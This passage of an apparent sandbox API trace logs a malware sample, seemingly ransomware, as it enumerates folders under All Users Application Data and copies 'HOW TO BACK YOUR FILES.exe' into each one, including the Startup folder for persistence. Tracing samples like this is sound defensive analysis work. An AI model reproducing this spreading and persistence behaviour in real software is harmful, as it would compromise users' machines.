lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53c55e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53c55e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.973] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.973] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.973] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data") returned="C:\\Users\\All Users\\Application Data" [0089.973] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee920 | out: hHeap=0x2b0000) returned 1 [0089.973] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0089.973] lstrlenW (lpString="C:\\Users\\All Users\\Application Data") returned 35 [0089.973] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data" | out: lpString1="C:\\Users\\All Users\\Application Data") returned="C:\\Users\\All Users\\Application Data" [0089.974] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.974] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.974] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.974] GetLastError () returned 0x0 [0089.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.974] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.974] CloseHandle (hObject=0x120) returned 1 [0089.974] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.975] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.975] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x454b2140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x454b2140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.975] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.975] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.975] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Templates", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Templates") returned="C:\\Users\\All Users\\Application Data\\Templates" [0089.975] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2238 | out: hHeap=0x2b0000) returned 1 [0089.975] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0089.975] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Templates") returned 45 [0089.975] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Templates" | out: lpString1="C:\\Users\\All Users\\Application Data\\Templates") returned="C:\\Users\\All Users\\Application Data\\Templates" [0089.975] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.975] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\templates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.976] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.976] GetLastError () returned 0x0 [0089.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.976] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.976] CloseHandle (hObject=0x120) returned 1 [0089.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.976] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.976] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Templates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4bb0d340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.978] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.978] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.978] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Sun", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Sun") returned="C:\\Users\\All Users\\Application Data\\Sun" [0089.978] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0089.978] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0089.978] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Sun") returned 39 [0089.978] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Sun" | out: lpString1="C:\\Users\\All Users\\Application Data\\Sun") returned="C:\\Users\\All Users\\Application Data\\Sun" [0089.978] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.978] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Sun\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\sun\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.978] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.979] GetLastError () returned 0x0 [0089.979] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.979] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.979] CloseHandle (hObject=0x120) returned 1 [0089.979] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.979] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.979] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Sun\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bb0d340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.979] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.979] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.979] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Sun\\Java", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Sun\\Java") returned="C:\\Users\\All Users\\Application Data\\Sun\\Java" [0089.979] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2238 | out: hHeap=0x2b0000) returned 1 [0089.979] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0089.979] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Sun\\Java") returned 44 [0089.979] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Sun\\Java" | out: lpString1="C:\\Users\\All Users\\Application Data\\Sun\\Java") returned="C:\\Users\\All Users\\Application Data\\Sun\\Java" [0089.979] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.979] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Sun\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\sun\\java\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.980] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.980] GetLastError () returned 0x0 [0089.980] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.980] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.980] CloseHandle (hObject=0x120) returned 1 [0089.980] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.980] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.980] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Sun\\Java\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bb0d340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.981] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.981] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.981] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Sun\\Java\\Java Update", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Sun\\Java\\Java Update") returned="C:\\Users\\All Users\\Application Data\\Sun\\Java\\Java Update" [0089.981] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0089.981] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0089.981] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Sun\\Java\\Java Update") returned 56 [0089.981] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Sun\\Java\\Java Update" | out: lpString1="C:\\Users\\All Users\\Application Data\\Sun\\Java\\Java Update") returned="C:\\Users\\All Users\\Application Data\\Sun\\Java\\Java Update" [0089.981] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.981] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Sun\\Java\\Java Update\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\sun\\java\\java update\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.981] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.982] GetLastError () returned 0x0 [0089.982] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.982] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.982] CloseHandle (hObject=0x120) returned 1 [0089.982] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.982] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.982] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Sun\\Java\\Java Update\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bb334a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb334a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.982] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.982] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.982] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu") returned="C:\\Users\\All Users\\Application Data\\Start Menu" [0089.982] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f21d0 | out: hHeap=0x2b0000) returned 1 [0089.982] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0089.982] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu") returned 46 [0089.982] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu") returned="C:\\Users\\All Users\\Application Data\\Start Menu" [0089.982] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.982] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.983] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.983] GetLastError () returned 0x0 [0089.983] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.983] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.983] CloseHandle (hObject=0x120) returned 1 [0089.983] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.983] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.983] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x59468c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59468c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.984] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.984] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.984] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs" [0089.984] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.984] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0089.984] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs") returned 55 [0089.984] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs" [0089.984] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.984] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.985] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.985] GetLastError () returned 0x0 [0089.985] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.985] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.985] CloseHandle (hObject=0x120) returned 1 [0089.985] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.985] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.985] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x59599720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59599720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.985] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.985] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.985] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Tablet PC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Tablet PC" [0089.985] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0089.985] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0089.985] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Tablet PC") returned 65 [0089.985] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Tablet PC" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Tablet PC" [0089.985] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.986] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Tablet PC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\tablet pc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.986] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.986] GetLastError () returned 0x0 [0089.986] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.986] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.986] CloseHandle (hObject=0x120) returned 1 [0089.986] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.986] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.987] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Tablet PC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4bb59600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb59600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.987] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.987] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.987] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Startup", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Startup") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Startup" [0089.987] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0089.987] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Startup") returned 63 [0089.987] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Startup" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Startup") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Startup" [0089.987] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.987] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Startup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\startup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.988] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.988] GetLastError () returned 0x0 [0089.988] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, 